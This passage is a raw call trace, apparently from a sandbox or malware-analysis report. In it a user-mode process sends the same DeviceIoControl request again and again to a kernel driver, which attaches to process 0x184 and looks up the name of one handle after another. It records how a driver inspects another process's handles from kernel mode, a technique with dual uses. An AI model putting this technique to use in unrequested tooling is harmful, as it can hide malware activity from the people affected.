| out: Object=0xfffff880052b3548*=0xfffff8a00190dc10, HandleInformation=0x0) returned 0x0 [0222.327] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.327] PsReleaseProcessExitSynchronization () returned 0x2 [0222.327] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.327] ObQueryNameString (in: Object=0xfffff8a00190dc10, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.327] ObfDereferenceObject (Object=0xfffff8a00190dc10) returned 0x1 [0222.327] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.327] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.327] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.327] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.327] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.327] PsAcquireProcessExitSynchronization () returned 0x0 [0222.327] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.328] ObReferenceObjectByHandle (in: Handle=0x700, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00190d3b0, HandleInformation=0x0) returned 0x0 [0222.328] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.328] PsReleaseProcessExitSynchronization () returned 0x2 [0222.328] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.328] ObQueryNameString (in: Object=0xfffff8a00190d3b0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.328] ObfDereferenceObject (Object=0xfffff8a00190d3b0) returned 0x1 [0222.328] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.328] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.328] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.328] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.328] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.328] PsAcquireProcessExitSynchronization () returned 0x0 [0222.328] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.328] ObReferenceObjectByHandle (in: Handle=0x710, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001907c00, HandleInformation=0x0) returned 0x0 [0222.328] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.328] PsReleaseProcessExitSynchronization () returned 0x2 [0222.328] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.328] ObQueryNameString (in: Object=0xfffff8a001907c00, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.328] ObfDereferenceObject (Object=0xfffff8a001907c00) returned 0x1 [0222.328] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.328] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.328] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.328] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.328] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.329] PsAcquireProcessExitSynchronization () returned 0x0 [0222.329] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.329] ObReferenceObjectByHandle (in: Handle=0x720, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001902fc0, HandleInformation=0x0) returned 0x0 [0222.329] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.329] PsReleaseProcessExitSynchronization () returned 0x2 [0222.329] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.329] ObQueryNameString (in: Object=0xfffff8a001902fc0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.329] ObfDereferenceObject (Object=0xfffff8a001902fc0) returned 0x1 [0222.329] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.329] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.329] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.329] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.329] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.329] PsAcquireProcessExitSynchronization () returned 0x0 [0222.329] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.329] ObReferenceObjectByHandle (in: Handle=0x72c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0015405a0, HandleInformation=0x0) returned 0x0 [0222.329] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.330] PsReleaseProcessExitSynchronization () returned 0x2 [0222.330] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.330] ObQueryNameString (in: Object=0xfffff8a0015405a0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.330] ObfDereferenceObject (Object=0xfffff8a0015405a0) returned 0x1 [0222.330] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.330] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.330] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.330] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.330] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.330] PsAcquireProcessExitSynchronization () returned 0x0 [0222.330] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.330] ObReferenceObjectByHandle (in: Handle=0x730, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0018f3c50, HandleInformation=0x0) returned 0x0 [0222.330] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.330] PsReleaseProcessExitSynchronization () returned 0x2 [0222.330] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.330] ObQueryNameString (in: Object=0xfffff8a0018f3c50, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.330] ObfDereferenceObject (Object=0xfffff8a0018f3c50) returned 0x1 [0222.330] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.330] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.330] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.330] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.330] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.330] PsAcquireProcessExitSynchronization () returned 0x0 [0222.330] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.331] ObReferenceObjectByHandle (in: Handle=0x744, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0019247d0, HandleInformation=0x0) returned 0x0 [0222.331] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.331] PsReleaseProcessExitSynchronization () returned 0x2 [0222.331] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.331] ObQueryNameString (in: Object=0xfffff8a0019247d0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.331] ObfDereferenceObject (Object=0xfffff8a0019247d0) returned 0x1 [0222.331] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.331] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.331] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.331] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.331] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.331] PsAcquireProcessExitSynchronization () returned 0x0 [0222.331] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.331] ObReferenceObjectByHandle (in: Handle=0x750, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001942af0, HandleInformation=0x0) returned 0x0 [0222.331] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.331] PsReleaseProcessExitSynchronization () returned 0x2 [0222.331] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.331] ObQueryNameString (in: Object=0xfffff8a001942af0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.331] ObfDereferenceObject (Object=0xfffff8a001942af0) returned 0x1 [0222.331] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.332] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.332] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.332] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.332] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.332] PsAcquireProcessExitSynchronization () returned 0x0 [0222.332] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.332] ObReferenceObjectByHandle (in: Handle=0x770, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00195c700, HandleInformation=0x0) returned 0x0 [0222.332] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.332] PsReleaseProcessExitSynchronization () returned 0x2 [0222.332] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.332] ObQueryNameString (in: Object=0xfffff8a00195c700, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.332] ObfDereferenceObject (Object=0xfffff8a00195c700) returned 0x1 [0222.332] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.332] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.332] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.332] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.332] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.332] PsAcquireProcessExitSynchronization () returned 0x0 [0222.332] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.332] ObReferenceObjectByHandle (in: Handle=0x774, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b9c060, HandleInformation=0x0) returned 0x0 [0222.332] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.332] PsReleaseProcessExitSynchronization () returned 0x2 [0222.332] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.332] ObQueryNameString (in: Object=0xfffff8a001b9c060, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.333] ObfDereferenceObject (Object=0xfffff8a001b9c060) returned 0x1 [0222.333] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.333] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.333] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.333] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.333] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.333] PsAcquireProcessExitSynchronization () returned 0x0 [0222.333] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.333] ObReferenceObjectByHandle (in: Handle=0x780, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b0ac80, HandleInformation=0x0) returned 0x0 [0222.333] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.333] PsReleaseProcessExitSynchronization () returned 0x2 [0222.333] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.333] ObQueryNameString (in: Object=0xfffff8a001b0ac80, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.333] ObfDereferenceObject (Object=0xfffff8a001b0ac80) returned 0x1 [0222.333] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.333] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.333] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.333] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.333] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.333] PsAcquireProcessExitSynchronization () returned 0x0 [0222.333] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.333] ObReferenceObjectByHandle (in: Handle=0x784, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00209faf0, HandleInformation=0x0) returned 0x0 [0222.334] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.334] PsReleaseProcessExitSynchronization () returned 0x2 [0222.334] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.334] ObQueryNameString (in: Object=0xfffff8a00209faf0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.334] ObfDereferenceObject (Object=0xfffff8a00209faf0) returned 0x1 [0222.334] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.334] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.334] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.334] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.334] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.334] PsAcquireProcessExitSynchronization () returned 0x0 [0222.334] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.334] ObReferenceObjectByHandle (in: Handle=0x7fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001db4fc0, HandleInformation=0x0) returned 0x0 [0222.334] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.334] PsReleaseProcessExitSynchronization () returned 0x2 [0222.334] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.334] ObQueryNameString (in: Object=0xfffff8a001db4fc0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.334] ObfDereferenceObject (Object=0xfffff8a001db4fc0) returned 0x1 [0222.334] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.335] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.335] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.335] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.335] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.335] PsAcquireProcessExitSynchronization () returned 0x0 [0222.335] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.335] ObReferenceObjectByHandle (in: Handle=0x808, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001dc1f00, HandleInformation=0x0) returned 0x0 [0222.335] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.335] PsReleaseProcessExitSynchronization () returned 0x2 [0222.335] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.335] ObQueryNameString (in: Object=0xfffff8a001dc1f00, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.335] ObfDereferenceObject (Object=0xfffff8a001dc1f00) returned 0x1 [0222.335] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.335] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.335] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.335] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.335] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.335] PsAcquireProcessExitSynchronization () returned 0x0 [0222.335] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.336] ObReferenceObjectByHandle (in: Handle=0x868, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0023ecf20, HandleInformation=0x0) returned 0x0 [0222.336] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.336] PsReleaseProcessExitSynchronization () returned 0x2 [0222.336] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.336] ObQueryNameString (in: Object=0xfffff8a0023ecf20, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.336] ObfDereferenceObject (Object=0xfffff8a0023ecf20) returned 0x1 [0222.336] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.336] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0222.336] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0222.336] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0222.336] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.336] PsAcquireProcessExitSynchronization () returned 0x0 [0222.336] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0222.336] ObReferenceObjectByHandle (in: Handle=0x878, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001da49c0, HandleInformation=0x0) returned 0x0 [0222.336] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.336] PsReleaseProcessExitSynchronization () returned 0x2 [0222.336] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0222.336] ObQueryNameString (in: Object=0xfffff8a001da49c0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: 